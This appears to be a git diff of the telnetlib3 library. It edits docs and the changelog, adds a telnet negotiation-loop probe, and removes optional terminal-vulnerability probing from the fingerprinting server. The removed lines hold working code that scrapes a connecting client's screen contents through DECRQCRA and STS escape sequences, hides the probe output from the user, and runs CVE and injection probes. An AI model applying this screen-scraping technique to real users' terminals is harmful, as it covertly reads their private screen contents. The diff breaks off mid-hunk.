diff --git a/README.rst b/README.rst index 02de17db..760d7818 100644 --- a/README.rst +++ b/README.rst @@ -142,9 +142,6 @@ supported, widely used by MUD servers to reduce bandwidth:: # connect to a MUD that offers MCCP compression telnetlib3-client dunemud.net 6789 - # or with TLS (compression auto-disabled over TLS, CRIME/BREACH mitigation) - telnetlib3-client --ssl dunemud.net 6788 - # actively request compression from a server telnetlib3-client --compression dunemud.net 6789 @@ -154,11 +151,9 @@ supported, widely used by MUD servers to reduce bandwidth:: # host a MUD server that advertises MCCP2/MCCP3 telnetlib3-server --compression --shell=my_mud.shell -By default (without ``--compression`` or ``--no-compression``), the client -passively accepts compression when offered by the server, and the server does -not advertise compression. Compression is automatically disabled over TLS -connections to avoid CRIME/BREACH attacks. - +By default (without ``--compression`` or ``--no-compression``), the telnetlib3-client passively +accepts compression when offered by the server, and the telnetlib3-server does not advertise +compression. Compression is automatically disabled over TLS connections. Asyncio Protocol ---------------- diff --git a/bin/server_mud.py b/bin/server_mud.py index 4819aea2..0400a34b 100755 --- a/bin/server_mud.py +++ b/bin/server_mud.py @@ -510,8 +510,6 @@ async def dispatch(self, text: str) -> bool: return True return await method(argument) - # -- commands ------------------------------------------------------- - async def do_help(self, argument: str) -> bool: """Show available commands.""" if argument: @@ -679,8 +677,6 @@ async def do_quit(self, *_args: str) -> bool: broadcast_room(self.writer, self.player.room, f"{self.player.name} has left.") return False - # -- helpers -------------------------------------------------------- - async def _move(self, direction: str) -> bool: """Move player in *direction*.""" w, p = self.writer, self.player diff --git a/docs/guidebook.rst b/docs/guidebook.rst index bb308ee0..5a6a1573 100644 --- a/docs/guidebook.rst +++ b/docs/guidebook.rst @@ -359,7 +359,7 @@ TLS / SSL Telnet over TLS (TELNETS, IANA port 992) secures the connection using standard TLS encryption. The TLS handshake is handled at the transport -layer — the telnet protocol sees plaintext exactly as it would over plain +layer, the telnet protocol sees plaintext exactly as it would over plain TCP. This is *not* STARTTLS (upgrade-in-place); the connection is encrypted from the start. @@ -426,10 +426,10 @@ Or programmatically with full control:: import ssl import telnetlib3 - # CA-signed server — just pass ssl=True + # CA-signed server, just pass ssl=True reader, writer = await telnetlib3.open_connection("dunemud.net", 6788, ssl=True) - # Self-signed — load the server's cert explicitly + # Self-signed, load the server's cert explicitly ctx = ssl.create_default_context(cafile="cert.pem") reader, writer = await telnetlib3.open_connection("localhost", 6023, ssl=ctx) @@ -447,7 +447,7 @@ certificates):: .. warning:: ``--ssl-no-verify`` is **insecure**. The connection is encrypted, but the - server's identity is not verified — a man-in-the-middle could intercept + server's identity is not verified, a man-in-the-middle could intercept traffic. Only use this for testing or when you trust the network path. server_tls.py diff --git a/docs/history.rst b/docs/history.rst index 0ce23566..7668f5a8 100644 --- a/docs/history.rst +++ b/docs/history.rst @@ -1,5 +1,16 @@ History ======= +4.0.3 + * bugfix: long-running servers leaked memory through :class:`~telnetlib3.server.Server` + ``_protocols`` list and ``_new_client`` asyncio.Queue. Both are now bounded + and regularly pruned. + * enhancement: ``telnetlib3.telnet`` now overlays std library module space, ``import telnetlib`` + :ghissue:`139`. + * enhancement: ``telnetlib3-fingerprint-server`` and ``telnetlib3-fingerprint`` client now also + detect "telnet loops" and "wrong direction" errors in opposing IAC parser. + * removed: ``telnetlib3-fingerprint-server`` no longer integrates with the (never released) + ``tv-detect`` package for terminal vulnerability probing. + 4.0.2 * bugfix: MCCP2 decompression failed on MUD servers using raw deflate or gzip-wrapped compression, producing garbled banners. The client now auto-detects zlib/gzip format and falls back to raw @@ -84,7 +95,7 @@ History server and client protocol code. * new: ``_atomic_json_write()`` and ``_BytesSafeEncoder`` helpers in ``_paths`` module for fingerprinting subsystem. - * enhancement: Microsoft Telnet (``telnet.exe``) compatibility refined — server + * enhancement: Microsoft Telnet (``telnet.exe``) compatibility refined, server now sends ``DO NEW_ENVIRON`` but excludes ``USER`` variable instead of skipping the option entirely, :ghissue:`24`. * enhancement: comprehensive pylint and mypy cleanup across the codebase. @@ -108,7 +119,7 @@ History MSSP, MSP, MXP, ZMP, AARDWOLF, ATCP) by default. Use ``--always-do`` or ``--always-will`` to opt in. * bugfix: log output "staircase text" in raw terminal mode. - * bugfix: graceful EOF handling — connection close no longer prints a traceback. + * bugfix: graceful EOF handling, connection close no longer prints a traceback. 2.5.0 * change: ``telnetlib3-client`` now defaults to raw terminal mode (no line @@ -159,7 +170,7 @@ History art) as surrogates instead of replacing them with U+FFFD. 2.4.0 - * new: ``telnetlib3.color_filter`` module — translates 16-color ANSI SGR + * new: ``telnetlib3.color_filter`` module, translates 16-color ANSI SGR codes to 24-bit RGB from hardware palettes (EGA, CGA, VGA, xterm). Enabled by default. New client CLI options: ``--colormatch``, ``--color-brightness``, ``--color-contrast``, ``--background-color``, @@ -181,11 +192,11 @@ History * enhancement: ``telnetlib3-fingerprint`` now always probes extended MUD options (MSP, MXP, ZMP, AARDWOLF, ATCP) during server scans and captures ZMP, ATCP, Aardwolf, MXP, and COM-PORT data in session output. - * enhancement: ``telnetlib3-fingerprint`` smart prompt detection — + * enhancement: ``telnetlib3-fingerprint`` smart prompt detectionm auto-answers yes/no, color, UTF-8 menu, ``who``, and ``help`` prompts. * enhancement: ``--banner-max-bytes`` option for ``telnetlib3-fingerprint``; default raised from 1024 to 65536. - * new: ATASCII (Atari 8-bit) codec — ``--encoding=atascii`` for connecting + * new: ATASCII (Atari 8-bit) codec, ``--encoding=atascii`` for connecting to Atari BBS systems. Maps all 256 byte values to Unicode including graphics characters, card suits, and the inverse-video range (0x80--0xFF). ATASCII EOL (0x9B) maps to newline. Aliases: ``atari8bit``, ``atari_8bit``. @@ -233,7 +244,7 @@ History * enhancement: reversed ``WILL``/``DO`` for directional options (e.g. ``WILL NAWS`` from server, ``DO TTYPE`` from client) now gracefully refused with ``DONT``/``WONT`` instead of raising :exc:`ValueError`. - * enhancement: ``NEW_ENVIRON SEND`` and response logging improved — + * enhancement: ``NEW_ENVIRON SEND`` and response logging improved, ``SEND (all)`` / ``env send: (empty)`` instead of raw byte dumps. * enhancement: ``telnetlib3-fingerprint`` now probes MSDP and MSSP options and captures MSSP server status data in session output. diff --git a/docs/rfcs.rst b/docs/rfcs.rst index 71eccc78..016bf327 100644 --- a/docs/rfcs.rst +++ b/docs/rfcs.rst @@ -14,6 +14,7 @@ RFCs Implemented * :rfc:`859`, "Telnet Status Option", May 1983. * :rfc:`860`, "Telnet Timing mark Option", May 1983. * :rfc:`885`, "Telnet End of Record Option", Dec 1983. +* :rfc:`930`, "Telnet Terminal Type Option", Jan 1984. * :rfc:`1073`, "Telnet Window Size Option", Oct 1988. * :rfc:`1079`, "Telnet Terminal Speed Option", Dec 1988. * :rfc:`1091`, "Telnet Terminal-Type Option", Feb 1989. @@ -59,8 +60,8 @@ RFCs Not Implemented * :rfc:`1041`, "Telnet 3270 Regime Option", Jan 1988 * :rfc:`1043`, "Telnet Data Entry Terminal Option", Feb 1988 * :rfc:`1097`, "Telnet Subliminal-Message Option", Apr 1989 -* :rfc:`1143`, "The Q Method of Implementing .. Option Negotiation", Feb 1990 - Approximately only Rules 1, 2, and 3, but not 4, 5, and 6. +* :rfc:`1143`, "The Q Method of Implementing .. Option Negotiation", Feb 1990, Approximately only + Rules 1, 2, and 3 are implemented, but not 4, 5, and 6. * :rfc:`1205`, "5250 Telnet Interface", Feb 1991 * :rfc:`1411`, "Telnet Authentication: Kerberos_ Version 4", Jan 1993 * :rfc:`1412`, "Telnet Authentication: SPX" diff --git a/pyproject.toml b/pyproject.toml index 9bd31f52..6389b750 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -45,7 +45,7 @@ classifiers = [ requires-python = ">=3.9" dependencies = [ "wcwidth>=0.6.0", - "blessed>=1.33; platform_system == 'Windows'", + "blessed>=1.41; platform_system == 'Windows'", ] [project.optional-dependencies] @@ -55,6 +55,7 @@ docs = [ "sphinx-autodoc-typehints", ] extras = [ + "blessed>=1.41", "prettytable>=3.17,<4", "ucs-detect>=2,<3", ] diff --git a/telnetlib3/client_shell_win32.py b/telnetlib3/client_shell_win32.py index 970269bf..2b03d0c7 100644 --- a/telnetlib3/client_shell_win32.py +++ b/telnetlib3/client_shell_win32.py @@ -241,8 +241,8 @@ async def telnet_client_shell( """ Windows telnet client shell using blessed/jinxed Terminal. - Requires ``blessed>=1.20`` (installed automatically on Windows via the - ``blessed; platform_system == 'Windows'`` dependency in pyproject.toml). + Requires blessed, installed automatically on Windows via the + ``blessed; platform_system == 'Windows'`` directive in pyproject.toml. """ with Terminal(telnet_writer=telnet_writer) as tty_shell: await _telnet_client_shell_impl(telnet_reader, telnet_writer, tty_shell) diff --git a/telnetlib3/encodings/big5bbs.py b/telnetlib3/encodings/big5bbs.py index a97591b7..7e3e3331 100644 --- a/telnetlib3/encodings/big5bbs.py +++ b/telnetlib3/encodings/big5bbs.py @@ -104,7 +104,7 @@ def decode(self, input: bytes, final: bool = False) -> str: # type: ignore[over result.append(bytes([b, b2]).decode("big5", errors="strict")) i += 2 except UnicodeDecodeError: - # Structurally valid but undefined in Big5 — treat + # Structurally valid but undefined in Big5, treat # the lone lead byte as a CP437 half-width character. result.append(bytes([b]).decode("cp437")) i += 1 diff --git a/telnetlib3/fingerprinting.py b/telnetlib3/fingerprinting.py index 473173ca..a5e1e1dc 100644 --- a/telnetlib3/fingerprinting.py +++ b/telnetlib3/fingerprinting.py @@ -14,7 +14,6 @@ # std imports import os -import re import sys import json import time @@ -95,22 +94,6 @@ from .stream_reader import TelnetReader, TelnetReaderUnicode from .stream_writer import TelnetWriter, TelnetWriterUnicode -# third-party (optional) — vulnerability probes from tv-detect -try: - from tv_detect.probes import CPR_RE as _CPR_RE - from tv_detect.probes import CPR_FENCE as _CPR_FENCE - from tv_detect.probes import DECCKSR_RE as _DECCKSR_RE - from tv_detect.probes import STS_SOS_RE as _STS_SOS_RE - from tv_detect.probes import DECRQCRA_TEMPLATE as _DECRQCRA - from tv_detect.probes import probe_sts as _tv_probe_sts - from tv_detect.probes import probe_decrqcra as _tv_probe_decrqcra - from tv_detect.probes import probe_injection as _tv_probe_injection - from tv_detect.probes import probe_cve_vulnerabilities as _tv_probe_cves - - _HAS_TV_DETECT = True -except ImportError: - _HAS_TV_DETECT = False - class ProbeResult(TypedDict, total=False): """Result of probing a single telnet option.""" @@ -168,7 +151,7 @@ class ProbeResult(TypedDict, total=False): "fingerprinting_post_script", "get_client_fingerprint", "probe_client_capabilities", - "scrape_screen_sts", + "probe_client_loop_detection", ) #: Extended NEW_ENVIRON variable list used during client fingerprinting. @@ -301,14 +284,12 @@ class FingerprintingServer(FingerprintingTelnetServer, TelnetServer): """ def connection_lost(self, exc: Optional[Exception]) -> None: - """Log connection close/loss with detected terminal label.""" - term_label = getattr(self.writer, "_tv_term_label", None) if self.writer else None - suffix = f" {term_label}" if term_label else "" + """Log connection close/loss.""" if not self._closing: if exc is None: - logger.info("Connection closed for %s%s", self, suffix) + logger.info("Connection closed for %s", self) else: - logger.info("Connection lost for %s: %s%s", self, exc, suffix) + logger.info("Connection lost for %s: %s", self, exc) self._closing = True # pylint: disable=attribute-defined-outside-init if exc is None: self.reader.feed_eof() @@ -408,6 +389,70 @@ def connection_lost(self, exc: Optional[Exception]) -> None: _OPT_BYTE_TO_NAME = {f"0x{opt[0]:02x}": name for opt, name, _ in _ALL_KNOWN_OPTIONS} +async def probe_client_loop_detection( + writer: TelnetWriter, probe_results: dict[str, ProbeResult], timeout: float = 0.3 +) -> list[str]: + """ + Detect clients that would re-negotiate already-agreed options (telnet loop). + + Saves the negotiation state for options the client already agreed to, + clears the cache, re-sends IAC DO / IAC WILL for those options, and + checks whether the client replies again. A well-behaved client ignores + redundant requests in the YES state; a loop-prone client replies again. + + Checks both directions: re-DO'ing options the client already WILL'd, + and re-WILL'ing options the client already DO'd. + + :returns: Sorted list of option names that would loop. + """ + from .telopt import DO, WILL + + looped: set[str] = set() + + for _label, opt_dict, probe_cmd in ( + ("remote", writer.remote_option, DO), + ("local", writer.local_option, WILL), + ): + agreed: dict[bytes, bool] = {} + for opt, enabled in opt_dict.items(): + if enabled: + agreed[opt] = True + if not agreed: + continue + + saved: dict[bytes, bool | None] = {} + for opt in agreed: + saved[opt] = opt_dict.get(opt) + opt_dict[opt] = None # type: ignore[assignment] + writer.pending_option.pop(probe_cmd + opt, None) + + try: + writer._in_loop_detection = True + for opt in agreed: + writer.iac(probe_cmd, opt) + + loop = asyncio.get_running_loop() + deadline = loop.time() + timeout + while loop.time() < deadline: + all_settled = all(opt_dict.get(opt) is not None for opt in agreed) + if all_settled: + break + await asyncio.sleep(0.05) + + for opt in agreed: + if opt_dict.get(opt) is not None: + looped.add(_opt_byte_to_name(opt)) + + finally: + writer._in_loop_detection = False + for opt, value in saved.items(): + opt_dict[opt] = value # type: ignore[assignment] + for opt in agreed: + writer.pending_option.pop(probe_cmd + opt, None) + + return sorted(looped) + + async def probe_client_capabilities( writer: Union[TelnetWriter, TelnetWriterUnicode], options: Optional[list[tuple[bytes, str, str]]] = None, @@ -586,6 +631,10 @@ def _collect_rejected_options( result["will"] = sorted(_opt_byte_to_name(opt) for opt in writer.rejected_will) if getattr(writer, "rejected_do", None): result["do"] = sorted(_opt_byte_to_name(opt) for opt in writer.rejected_do) + if getattr(writer, "directional_refusals", None): + result["directional"] = sorted( + _opt_byte_to_name(opt) for opt in writer.directional_refusals + ) return result @@ -697,7 +746,9 @@ def _collect_slc_tab(writer: Union[TelnetWriter, TelnetWriterUnicode]) -> dict[s def _create_protocol_fingerprint( - writer: Union[TelnetWriter, TelnetWriterUnicode], probe_results: dict[str, ProbeResult] + writer: Union[TelnetWriter, TelnetWriterUnicode], + probe_results: dict[str, ProbeResult], + looped_options: Optional[list[str]] = None, ) -> dict[str, Any]: """ Create anonymized/summarized protocol fingerprint from session data. @@ -756,6 +807,10 @@ def _create_protocol_fingerprint( fingerprint["rejected-will"] = rejected["will"] if rejected.get("do"): fingerprint["rejected-do"] = rejected["do"] + if rejected.get("directional"): + fingerprint["directional-refusals"] = rejected["directional"] + if looped_options: + fingerprint["looped-negotiation"] = looped_options linemode_probed = any( name == "LINEMODE" and info["status"] == "WILL" for name, info in probe_results.items() @@ -1011,6 +1066,7 @@ def _save_fingerprint_data( probe_results: dict[str, ProbeResult], probe_time: float, session_fp: Optional[dict[str, Any]] = None, + looped: Optional[list[str]] = None, ) -> Optional[str]: """ Save comprehensive fingerprint data to a JSON file. @@ -1032,7 +1088,7 @@ def _save_fingerprint_data( if session_fp is None: session_fp = _build_session_fingerprint(writer, probe_results, probe_time) - protocol_fp = _create_protocol_fingerprint(writer, probe_results) + protocol_fp = _create_protocol_fingerprint(writer, probe_results, looped_options=looped) telnet_hash = _hash_fingerprint(protocol_fp) session_identity = _create_session_fingerprint(writer) @@ -1106,390 +1162,6 @@ def _is_maybe_ms_telnet(writer: Union[TelnetWriter, TelnetWriterUnicode]) -> boo return True -if not _HAS_TV_DETECT: - _CPR_RE = re.compile(rb"\x1b\[(\d+);(\d+)R") # noqa: F811 - _DECRQCRA = "\x1b[{pid};1;{r};{c};{r};{c}*y" # noqa: F811 - _DECCKSR_RE = re.compile(rb"\x1bP(\d+)!~([0-9A-Fa-f]{4})\x1b\\") # noqa: F811 - _STS_SOS_RE = re.compile(rb"\x1bXCTerm:STS:(\d+):(.*?)\x1b\\", re.DOTALL) # noqa: F811 - _CPR_FENCE = "\x1b[6n" # noqa: F811 - - -async def _read_until_cpr( - reader: Union[TelnetReader, TelnetReaderUnicode], timeout: float = 1.0 -) -> tuple[Optional[re.Match[bytes]], bytes]: - """Read from reader until a CPR response arrives or timeout.""" - buf = b"" - deadline = asyncio.get_running_loop().time() + timeout - while True: - remaining = deadline - asyncio.get_running_loop().time() - if remaining <= 0: - break - try: - raw = await asyncio.wait_for(reader.read(256), timeout=remaining) - except (asyncio.TimeoutError, ConnectionError): - break - if not raw: - break - if isinstance(raw, str): - buf += raw.encode("latin-1") - else: - buf += cast(bytes, raw) - match = _CPR_RE.search(buf) - if match: - return match, buf - return None, buf - - -def _make_send_recv( - reader: Union[TelnetReader, TelnetReaderUnicode], - writer: Union[TelnetWriter, TelnetWriterUnicode], -) -> Any: - """Create a send_recv callback for tv-detect probes.""" - _writer = cast(TelnetWriterUnicode, writer) - - async def send_recv(sequence: str, timeout: float) -> tuple[Optional[re.Match[bytes]], bytes]: - _writer.write(sequence) - await _writer.drain() - return await _read_until_cpr(reader, timeout) - - return send_recv - - -async def _shielded_probe( - reader: Union[TelnetReader, TelnetReaderUnicode], - writer: Union[TelnetWriter, TelnetWriterUnicode], - number: int, - name: str, - description: str, - sequence: str, - timeout: float = 1.0, -) -> tuple[Optional[re.Match[bytes]], bytes]: - """ - Run a probe with shielded display: heading, description, and CPR cloaking. - - Writes a heading with ``=`` underline, description, and ``payload:`` label, - then records the cursor position via CPR, sends the probe sequence, and - restores the cursor to overwrite any visible payload output with ``ok``. - - :param reader: Telnet reader for CPR responses. - :param writer: Telnet writer for display and probe output. - :param number: Display number for this probe. - :param name: Short probe name (used as heading). - :param description: One-line description shown below the heading. - :param sequence: Raw escape sequence payload (CPR fence appended automatically). - :param timeout: Seconds to wait for probe CPR response. - :returns: ``(cpr_match, buf)`` — same as :func:`_read_until_cpr`. - """ - _writer = cast(TelnetWriterUnicode, writer) - - heading = f"{number}. {name}" - underline = "=" * len(heading) - _writer.write(f"{heading}\r\n{underline}\r\n\r\n{description}\r\npayload: ") - await _writer.drain() - - # Record cursor position via CPR. - _writer.write("\x1b[6n") - await _writer.drain() - pos_match, _ = await _read_until_cpr(reader, 1.0) - saved_row = saved_col = None - if pos_match: - saved_row = int(pos_match.group(1)) - saved_col = int(pos_match.group(2)) - - # Send probe payload + CPR fence. - _writer.write(sequence + _CPR_FENCE) - await _writer.drain() - cpr_match, buf = await _read_until_cpr(reader, timeout) - - # Restore cursor position, overwrite with "ok", clear to end of line. - if saved_row is not None: - _writer.write(f"\x1b[{saved_row};{saved_col}H") - _writer.write("ok\x1b[K\r\n") - await _writer.drain() - - return cpr_match, buf - - -async def scrape_screen_sts( - reader: Union[TelnetReader, TelnetReaderUnicode], - writer: Union[TelnetWriter, TelnetWriterUnicode], - rows: int = 25, - cols: int = 80, - timeout: float = 5.0, -) -> Optional[dict[str, Any]]: - """ - Scrape full screen contents via STS. - - :returns: dict with screen content as list of row strings, or None. - """ - _writer = cast(TelnetWriterUnicode, writer) - - # SSA at (1,1), cursor to (rows,cols), STS - _writer.write("\x1b[1;1H" "\x1bF" f"\x1b[{rows};{cols}H" "\x1bS") - await _writer.drain() - - buf = b"" - deadline = asyncio.get_running_loop().time() + timeout - while True: - remaining = deadline - asyncio.get_running_loop().time() - if remaining <= 0: - break - try: - raw = await asyncio.wait_for(reader.read(4096), timeout=remaining) - except (asyncio.TimeoutError, ConnectionError): - break - if not raw: - break - if isinstance(raw, str): - buf += raw.encode("latin-1") - else: - buf += cast(bytes, raw) - if b"\x1b\\" in buf: - break - - match = _STS_SOS_RE.search(buf) - if not match: - return None - - content = match.group(2) - # Split into rows of `cols` characters each - text = content.decode("latin-1", errors="replace") - screen_rows = [] - for r in range(rows): - start = r * cols - end = start + cols - if start < len(text): - screen_rows.append(text[start:end].rstrip()) - else: - screen_rows.append("") - - return {"method": "sts", "rows": rows, "cols": cols, "normal": screen_rows} - - -_UNKNOWN_CKSUM_RE = re.compile(r"\?0x[0-9A-Fa-f]{4}") -_ALT_SCREEN_ON = "\x1b[?47h" -_ALT_SCREEN_OFF = "\x1b[?47l" -_XTCHECKSUM = "\x1b[3#y" -_PRINTABLE = range(32, 127) - - -async def _blast_collect( - reader: Union[TelnetReader, TelnetReaderUnicode], expected: int, timeout: float = 2.0 -) -> dict[int, int]: - """Collect DECRQCRA checksum responses, returning {pid: checksum}.""" - results: dict[int, int] = {} - buf = b"" - deadline = asyncio.get_running_loop().time() + timeout - while len(results) < expected: - remaining = deadline - asyncio.get_running_loop().time() - if remaining <= 0: - break - try: - raw = await asyncio.wait_for(reader.read(65536), timeout=remaining) - except (asyncio.TimeoutError, ConnectionError): - break - if not raw: - break - if isinstance(raw, str): - buf += raw.encode("latin-1") - else: - buf += cast(bytes, raw) - for m in _DECCKSR_RE.finditer(buf): - results[int(m.group(1))] = int(m.group(2), 16) - last_st = buf.rfind(b"\x1b\\") - if last_st >= 0: - buf = buf[last_st + 2 :] - return results - - -async def _build_checksum_lookup( - reader: Union[TelnetReader, TelnetReaderUnicode], - writer: Union[TelnetWriter, TelnetWriterUnicode], - cal_row: int, - usable_cols: int, -) -> dict[int, str]: - """Build checksum-to-character lookup by calibrating printable ASCII.""" - _writer = cast(TelnetWriterUnicode, writer) - table: dict[int, str] = {} - offset = 0 - printable = list(_PRINTABLE) - - while offset < len(printable): - batch = printable[offset : offset + usable_cols] - s = f"\x1b[{cal_row};1H" + "".join(chr(c) for c in batch) - for i, code in enumerate(batch): - s += _DECRQCRA.format(pid=code, r=cal_row, c=i + 1) - _writer.write(s) - await _writer.drain() - - results = await _blast_collect(reader, len(batch), timeout=5.0) - _writer.write(f"\x1b[{cal_row};1H\x1b[2K") - await _writer.drain() - - if len(results) < len(batch): - return {} - - for code in batch: - cksum = results.get(code) - if cksum is None: - return {} - table[cksum] = chr(code) - - offset += usable_cols - - return table - - -async def _blast_scrape( - reader: Union[TelnetReader, TelnetReaderUnicode], - writer: Union[TelnetWriter, TelnetWriterUnicode], - rows: int, - cols: int, - lookup: dict[int, str], - timeout: float = 10.0, -) -> str: - """Scrape entire screen contents using DECRQCRA.""" - _writer = cast(TelnetWriterUnicode, writer) - space_cksum = next((k for k, v in lookup.items() if v == " "), None) - - queries = [] - for row in range(1, rows + 1): - for col in range(1, cols + 1): - pid = (row - 1) * cols + (col - 1) - queries.append(_DECRQCRA.format(pid=pid, r=row, c=col)) - _writer.write("".join(queries)) - await _writer.drain() - - results = await _blast_collect(reader, rows * cols, timeout=timeout) - - lines = [] - for row in range(1, rows + 1): - chars = [] - for col in range(1, cols + 1): - pid = (row - 1) * cols + (col - 1) - cksum = results.get(pid) - if cksum is None or cksum == 0 or cksum == space_cksum: - chars.append(" ") - elif cksum in lookup: - chars.append(lookup[cksum]) - else: - chars.append(f"?0x{cksum:04X}") - lines.append("".join(chars).rstrip()) - return "\n".join(lines).strip() - - -async def scrape_screen( - reader: Union[TelnetReader, TelnetReaderUnicode], - writer: Union[TelnetWriter, TelnetWriterUnicode], - rows: int, - cols: int, -) -> Optional[dict[str, Any]]: - """ - Scrape screen contents via DECRQCRA before any output is sent. - - :returns: dict with screen_0 (and optionally screen_1) or None. - """ - _writer = cast(TelnetWriterUnicode, writer) - usable_cols = cols - 1 - - # discover current cursor row via CPR - _writer.write("\x1b[6n") - await _writer.drain() - cpr_match, _ = await _read_until_cpr(reader, timeout=2.0) - cal_row = int(cpr_match.group(1)) if cpr_match else rows - - # set XTerm-compatible checksum mode - _writer.write(_XTCHECKSUM) - await _writer.drain() - # drain any response - await asyncio.sleep(0.1) - while True: - try: - data = await asyncio.wait_for(reader.read(256), timeout=0.1) - if not data: - break - except (asyncio.TimeoutError, ConnectionError): - break - - # probe DECRQCRA support - _writer.write(f"\x1b[{cal_row};1HA") - _writer.write(_DECRQCRA.format(pid=9999, r=cal_row, c=1)) - _writer.write("\x1b[6n") - await _writer.drain() - - cpr_match, buf = await _read_until_cpr(reader, timeout=2.0) - if cpr_match: - buf = buf[: cpr_match.start()] + buf[cpr_match.end() :] - - probe_ok = False - for m in _DECCKSR_RE.finditer(buf): - if int(m.group(1)) == 9999: - probe_ok = True - break - - _writer.write(f"\x1b[{cal_row};1H\x1b[2K") - await _writer.drain() - - if not probe_ok: - logger.info("scrape_screen: DECRQCRA probe failed") - return None - - lookup = await _build_checksum_lookup(reader, writer, cal_row, usable_cols) - if not lookup: - logger.info("scrape_screen: lookup table build failed") - return None - - logger.info("scrape_screen: lookup table built, %d entries", len(lookup)) - - # verify round-trip - _writer.write(f"\x1b[{cal_row};1HZ") - _writer.write(_DECRQCRA.format(pid=1, r=cal_row, c=1)) - _writer.write("\x1b[6n") - await _writer.drain() - - cpr_match, buf = await _read_until_cpr(reader, timeout=1.0) - if cpr_match: - buf = buf[: cpr_match.start()] + buf[cpr_match.end() :] - verify_results: dict[int, int] = {} - for m in _DECCKSR_RE.finditer(buf): - verify_results[int(m.group(1))] = int(m.group(2), 16) - _writer.write(f"\x1b[{cal_row};1H\x1b[2K") - await _writer.drain() - - verify_cksum = verify_results.get(1) - if verify_cksum is None or lookup.get(verify_cksum) != "Z": - logger.info("scrape_screen: verify failed, got %r for Z", verify_results.get(1)) - return None - - # Scale timeout by screen size — ~5ms per cell is generous for - # high-latency links, with a 10s floor. - scrape_timeout = max(10.0, rows * cols * 0.005) - - normal = await _blast_scrape(reader, writer, rows, cols, lookup, timeout=scrape_timeout) - normal_clean = _UNKNOWN_CKSUM_RE.sub(" ", normal) - - _writer.write(_ALT_SCREEN_ON) - await _writer.drain() - alt = await _blast_scrape(reader, writer, rows, cols, lookup, timeout=scrape_timeout) - _writer.write(_ALT_SCREEN_OFF) - await _writer.drain() - alt_clean = _UNKNOWN_CKSUM_RE.sub(" ", alt) - - result: dict[str, Any] = { - "decrqcra": True, - "screen_0": normal_clean, - "screen_0_with_unknown_checksums": normal, - "rows": rows, - "cols": cols, - } - - if normal_clean != alt_clean: - result["screen_1"] = alt_clean - result["screen_1_with_unknown_checksums"] = alt - - return result - - async def fingerprinting_server_shell( reader: Union[TelnetReader, TelnetReaderUnicode], writer: Union[TelnetWriter, TelnetWriterUnicode], @@ -1506,21 +1178,6 @@ async def fingerprinting_server_shell( """ from .server_pty_shell import pty_shell - async def _handle_telnet_attack(_writer: TelnetWriterUnicode, attack_key: str) -> None: - """Execute a telnet-layer attack by key.""" - if not _HAS_TV_DETECT: - return - from .attacks import ATTACKS - - attack = ATTACKS.get(attack_key) - if not attack: - return - handler = attack.get("handler") - if handler == "telnet_new_environ_user": - logger.info("executing telnet-layer attack: NEW_ENVIRON USER") - _writer._send_environ_batch(["USER"]) - await _writer.drain() - writer = cast(TelnetWriterUnicode, writer) probe_results, probe_time = await _run_probe(writer, verbose=False) @@ -1532,12 +1189,15 @@ async def _handle_telnet_attack(_writer: TelnetWriterUnicode, attack_key: str) - # Collect fingerprint data BEFORE disabling LINEMODE, so that # _collect_slc_tab sees remote_option[LINEMODE] as True. session_fp = _build_session_fingerprint(writer, probe_results, probe_time) - filepath = _save_fingerprint_data(writer, probe_results, probe_time, session_fp) - # Store TTYPE for connection_lost logging - writer._tv_term_label = repr( # type: ignore[attr-defined] - (writer.get_extra_info("TERM") or "unknown").lower() - ) + # Detect telnet option re-negotiation loops (clients that would WILL/WONT + # options they have already settled). + looped = await probe_client_loop_detection(writer, probe_results, timeout=_PROBE_TIMEOUT) + if looped: + logger.debug("probe: %d looped options: %s", len(looped), looped) + else: + logger.debug("probe: no looped options detected") + filepath = _save_fingerprint_data(writer, probe_results, probe_time, session_fp, looped=looped) # Disable LINEMODE if it was negotiated - stay in kludge mode (SGA+ECHO) # for PTY shell. LINEMODE causes echo loops with GNU telnet when running @@ -1562,74 +1222,8 @@ async def _handle_telnet_attack(_writer: TelnetWriterUnicode, attack_key: str) - break try: - if filepath is not None and _HAS_TV_DETECT and not is_mud_client: - # Run CVE, injection, STS, and DECRQCRA probes over the telnet - # connection before launching the PTY subprocess. - send_recv = _make_send_recv(reader, writer) - logger.debug("probe: CVE vulnerabilities") - cve_results = await _tv_probe_cves(send_recv) - logger.debug("probe: CVE done, %d results", len(cve_results)) - - logger.debug("probe: injection (DECRQSS)") - injection_result = await _tv_probe_injection(send_recv) - logger.debug( - "probe: injection done, result=%s", - injection_result.get("injectable") if injection_result else None, - ) - - rows = writer.get_extra_info("rows") or 25 - cols = writer.get_extra_info("cols") or 80 - logger.debug("probe: STS screen scrape") - sts_result = await _tv_probe_sts(send_recv, rows=rows, cols=cols) - logger.debug( - "probe: STS done, result=%s", sts_result.get("sts") if sts_result else None - ) - - scrape_result: Optional[dict[str, Any]] = None - - if sts_result and sts_result.get("sts"): - logger.debug("probe: STS screen scrape content") - try: - scrape_result = await asyncio.wait_for( - scrape_screen_sts(reader, writer, rows, cols), timeout=2.0 - ) - except asyncio.TimeoutError: - logger.info("probe: STS screen scrape timed out") - scrape_result = None - - logger.debug("probe: DECRQCRA") - decrqcra_result = await _tv_probe_decrqcra(send_recv) - logger.debug( - "probe: DECRQCRA done, result=%s", - decrqcra_result.get("decrqcra") if decrqcra_result else None, - ) - if not scrape_result and decrqcra_result and decrqcra_result.get("decrqcra"): - logger.debug("probe: DECRQCRA screen scrape") - try: - scrape_result = await asyncio.wait_for( - scrape_screen(reader, writer, rows, cols), timeout=2.0 - ) - except asyncio.TimeoutError: - logger.info("probe: DECRQCRA screen scrape timed out") - scrape_result = None - - with open(filepath, encoding="utf-8") as f: - data = json.load(f) - data["cve_results"] = cve_results - if injection_result: - data["injection_probe"] = injection_result - if sts_result: - data["sts_probe"] = sts_result - if decrqcra_result: - data["decrqcra_probe"] = decrqcra_result - if scrape_result: - data["screen-scrape"] = scrape_result - elif decrqcra_result: - data["screen-scrape"] = {"decrqcra": decrqcra_result.get("decrqcra", False)} - _atomic_json_write(filepath, data) - if filepath is not None: - # Switch to latin-1 for PTY shell — lossless byte passthrough + # Switch to latin-1 for PTY shell, lossless byte passthrough # required for binary protocols like ZMODEM. Done after probing # so that ucs-detect and other Unicode probes use UTF-8. if (writer.get_extra_info("TERM") or "").lower() == "syncterm": @@ -1644,12 +1238,12 @@ async def _handle_telnet_attack(_writer: TelnetWriterUnicode, attack_key: str) - writer._protocol._extra["IPADDRESS"] = peername[0] if client_has_sga and not is_mud_client: - 